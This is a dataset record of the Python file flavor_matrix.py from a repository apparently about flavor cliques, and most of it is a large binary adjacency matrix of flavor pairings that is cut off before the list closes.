| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
10416e7e1581b93e327f5c728edd60f519c294cb
| 19,917
|
py
|
Python
|
flavor_matrix.py
|
martincyoung/Flavor-Cliques
|
8b932f9028451b14411616aa780162682a374558
|
[
"MIT"
] | 1
|
2021-11-28T23:11:36.000Z
|
2021-11-28T23:11:36.000Z
|
flavor_matrix.py
|
martincyoung/Flavor-Cliques
|
8b932f9028451b14411616aa780162682a374558
|
[
"MIT"
] | null | null | null |
flavor_matrix.py
|
martincyoung/Flavor-Cliques
|
8b932f9028451b14411616aa780162682a374558
|
[
"MIT"
] | null | null | null |
FLAVOR_MATRIX = [
[0,0,1,1,1,1,0,0,0,1,0,0,0,0,1,1,0,1,0,0,1,0,0,1,0,1,0,0,1,0,1,1,1,1,0,1,1,0,0,0,0,0,0,1,1,1,0,0,1,0,1,1,0,0,1,1,0,0,0,1,0,0,0,1,1,0,1,0,0,0,0,1,0,1,0,0,0,0,1,1,1,1,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0],
[0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,1,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,1,0,1,0,0,1,0,0,0,1,0,0,0,0,1,0,0,1],
[1,0,0,1,0,1,0,0,1,1,1,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,1,1,0,1,0,0,0,1,0,0,1,1,0,0,0,1,1,0,1,0,0,0,1,1,0,0,0,1,1,1,0,1,1,0,1,1,0,1,1,0,0,1,1,1,0,0,0,1,0,0,1,0,1,0,0,1,1,0,1,0,1,1,1,0,0,0,1],
[1,0,1,0,0,0,0,0,1,0,0,0,1,0,1,0,1,1,0,0,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,1,1,0,0,0,1,0,0,0,1,0,0,0,0,0,1,1,1,1,0,0,0,0,1,0,0,1,1,0,1,0,0,0,0,0,1,1,1,0,0,0,0],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,0,0,0,0,1,0,1,0,0,1,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,1,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0],
[1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,1,0,1,0,0,1,0,0,0,1,0,1,0,0,0,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1],
[0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0],
[0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,1,1,0,1,0,1,0,0,0,0,0,0,1,1,0,1,0,0,0,0,1,0,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0],
[0,0,1,1,0,0,0,1,0,1,0,1,0,1,0,0,1,0,1,1,1,1,0,1,0,0,0,0,0,0,1,1,1,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,1,1,1,1,1,1,0,0,0,1,1,1,0,0,0,0,0,0,1,1,0,0,0,0,1,1,1,0,0,1,0,0,0,1],
[1,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,1,0,1,0,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0],
[0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,1,0,1,0,0,1,0,0,1,0,0,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,0,1,0,0,0,0,0],
[0,1,1,0,0,0,0,0,1,0,0,0,1,1,1,0,0,0,1,1,0,1,1,0,1,0,0,1,0,0,0,1,0,1,1,1,1,0,0,0,0,1,1,0,1,1,0,0,0,0,1,0,1,1,0,1,1,1,0,0,1,1,0,1,1,1,1,1,1,1,1,0,1,1,0,1,1,0,0,0,0,0,0,0,1,0,0,0,1,1,1,1,0,1,0,1,0,0,0],
[0,1,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,1,1,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0],
[0,0,0,0,0,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0],
[1,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0],
[1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0],
[0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,1,0,1,1,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0],
[0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0],
[1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,1,0,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0],
[0,1,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,1,0,0,0,0,0,0,0,1],
[1,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0],
[0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0],
[0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,1,0,0,1,0,1,0,0,0,0,1,0,0,1,1,1,0,0,0,0,0,0,1,0,1,0,0,0,0,1,0,1,0,0,0,0,1],
[1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,1,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0],
[1,0,1,0,0,0,0,1,1,1,1,0,0,1,0,0,0,0,1,0,0,1,0,0,0,0,1,1,0,1,0,1,0,0,0,1,0,1,0,0,0,0,1,0,1,0,0,0,1,0,1,1,0,0,0,1,1,0,0,0,0,1,0,0,0,1,0,1,0,1,1,0,1,1,0,0,1,0,0,0,1,0,1,1,1,0,0,0,0,1,1,1,0,1,0,1,0,0,0],
[1,1,1,0,0,0,1,1,1,0,0,1,0,1,0,0,0,0,0,1,1,1,0,0,0,1,0,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,1,0,1,1,0,1,0,0,1,0,0,0,0,1,1,1,1,0,1,0,0,1,1,0,1,1,0,0,0,0,1,0,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,1,0,0],
[1,0,1,0,1,0,0,1,1,1,0,0,1,0,0,1,1,0,0,0,0,0,0,1,0,1,0,0,1,1,0,1,0,1,0,1,1,0,0,0,0,0,0,1,0,1,0,1,0,0,0,1,0,0,0,1,1,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,1,1,0,0,0,1,0,1,1,0,0,0,0,0,1,0,1,1,0,1,1,0,0,1,1,0],
[1,0,1,1,1,0,0,0,0,1,0,1,0,0,0,0,0,1,0,0,1,0,0,1,1,0,0,0,1,0,0,0,1,0,1,1,1,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,0,1,0,0,1,0,0],
[0,0,0,1,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0],
[1,1,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,1,1,1,1,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,0,1,0,0,0,0,1,1],
[1,0,0,0,0,0,0,1,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,1,1,1,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0],
[0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,0,1,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,1,1,1,0,1,0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,1,0,1],
[0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,1,1,0,0,0,1,0,0,1,0,0,1,0,0,0,0,0,1,0,1],
[0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0],
[0,0,0,0,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,1,0,1,0,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1],
[0,1,1,0,0,1,0,0,1,1,1,1,1,1,0,0,1,0,0,0,0,1,0,0,0,0,1,1,0,0,1,1,0,0,0,1,0,0,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,1,0,1,0,1,1,0,1,0,0,0,0,1,1,1,0,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,0,1,0,0,0],
[1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,0,0,0,0,0],
[1,1,0,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,1,1,1,0,0,0,0,0,1,0,1,0,0,0,1,0,0,1,0,0,1,0,0,1,1,0,1,1,1,0,0,1,0,0,0,0,0,0,1,1,0,0,0,0,1,0,0,1,0,1,0,0,1,1,1,0,1,1,0,0,0,1],
[1,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,1,1,1,1,0,1,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,1,0,0,1,0,1,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,1],
[0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,1,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0],
[0,0,1,0,1,0,0,0,0,0,1,0,1,0,1,0,0,0,0,0,1,0,1,0,0,0,0,0,1,0,0,1,1,0,0,0,1,1,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,1,1,0,0],
[1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,1,0,0,0,0,1],
[0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0],
[1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,1,0,0,1,0,0,0,0,1],
[1,0,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,0,1,0,1,0,0,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1],
[0,0,0,1,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,1],
[0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[1,1,1,0,1,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,1,1,0,0,0,1,1,1,0,0,0,1,0,0,0,1,0,0,1,1,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,1,0,1,0,0,1,0,0,0,0,1,0,1,0,0,0,1,0,0,1,0,1,1,0,1,0,0,0,1,1,1,0,0,0,0,0,0,0,0],
[1,1,1,0,0,1,0,0,0,0,1,1,0,0,0,0,0,1,0,1,0,0,1,0,0,0,1,0,0,0,1,1,1,0,0,1,0,1,1,0,1,1,1,0,0,1,1,1,0,0,0,0,0,1,1,0,1,0,0,0,1,0,0,1,1,0,1,1,1,0,0,0,0,0,0,0,1,0,0,0,1,1,1,0,1,1,0,0,0,1,1,0,0,0,0,0,0,1,1],
[0,1,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,1,1,1,0,1,0,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,0,1,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,1,0,1],
[0,0,0,1,0,0,0,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0],
[0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,1,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0],
[0,0,1,0,0,1,0,1,0,0,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,1,0,1,1,1,0,1,1,1,1,1,0,0,0,0,0,0,1,1,1,0,1,1,0,1,0,1,0,1,1,0,1,0,1,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0],
[0,0,1,0,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,0,1,0,1,1,0,0,0,0,0,0,1,1,0,0,0,0,1,0,0,1,0,1,0,0,1,1,1,0,1,0,0,0,0,1],
[0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,1,0,1,1,0,0,0,0,0],
[1,0,1,0,0,1,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,1,1,0,1,1,0,0,0,0,0,0,1,0,0,1,1,1,0,0,1,1,0,0,0,1,0,0,1,0,1,0,0,0,0,1,1,0,0,1,0,1,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0],
[1,1,1,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,1,1],
[0,1,0,0,0,0,0,0,1,0,0,1,1,1,0,0,1,0,0,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,1,0,0,1,0,1,1,0,0,0,0,1,0,0,0,1,0,0,1,0,0,1,1,1,1,0,0,1,1,0,0,1,0,0,0,0,1,1,0,0,0,0,1,0,1,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0],
[1,0,1,1,1,1,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,1,1,1,0,1,1,1,0,0,0,0,1,0,1,0,0,0,1,1,0,0,1,0,1,1,0,1,1,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,0,0,0,0,1,1,1,1,0,0,0,0,1,0,1,0,0,1,1,0,1,0,0,1],
[0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,1,0,0,1,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0],
[0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,1],
[0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,1,0,0,1],
[0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,0,0,1,0,1,0,1,0,0,0,0,0,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,1,1,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0],
